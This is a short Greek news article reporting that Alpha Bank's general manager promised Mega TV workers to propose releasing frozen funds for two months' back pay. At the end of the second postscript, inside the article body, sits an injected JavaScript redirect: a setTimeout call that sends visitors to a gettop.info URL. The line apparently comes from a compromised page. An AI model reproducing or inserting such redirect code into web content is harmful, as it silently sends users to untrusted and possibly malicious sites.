Η Αlpha bank υποσχέθηκε να ξεπαγώσει 2 εκατ ευρώ για μισθούς στο Mega…

0
10

Επιτροπή των εργαζομένων του Mega, που διαδήλωσαν έξω από την Alpha bank, συναντήθηκε με τον γενικό διευθυντή της τράπεζας Γιώργο Αρώνη και του ζήτησαν να αποδεσμευτούν χρήματα για να τους καταβληθούν τα δεδουλευμένα τους.

Εκείνος τους ανακοίνωσε πως θα μεταφέρει το αίτημά τους και στις άλλες πιστώτριες τράπεζες, με εισήγηση να γουν από τους «παγωμένους» λογαριασμούς του καναλιού συνολικά 2,5 εκατ ευρώ. Τα δυο εκατ για μισθούς των εργαζομένων (αντιστοιχούν σε δυο μηνιάτικα) και οι 5οο,οο για όσους έχουν κάνει ασφαλιστικά μέτρα.

Κατόπιν αυτής της εξέλιξης θεωρείται πιθανό στις αρχές της επόμενης εβδομάδας  να λάβουν δυο, από τους συνολικά έξι, μισθούς που τους οφείλονται οι περίπου 500 εργαζόμενοι του σταθμού.

ΥΓ 1 Μέσα στους δεσμευμένους λογαριασμούς εκτιμάται ότι υπάρχουν, πλέον, περισσότερα από 30 εκατ ευρώ έσοδα από διαφημίσεις.

ΥΓ 2 Στην περίπτωση που το Συμβούλιο Επικρατείας κρίνει ότι κακώς έγινε ο διαγωνισμός για τις τηλεοπτικές άδειες από τη γενική γραμματεία Ενημέρωσης, οι τράπεζες θα περιμένουν τις κινήσεις των μετόχων του Mega και ειδικότερα το αν θα προχωρήσουν σε αύξηση μετοχικού κεφαλαίου, όπως είχαν δεσμευτεί από τον Μάιο του 2015. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here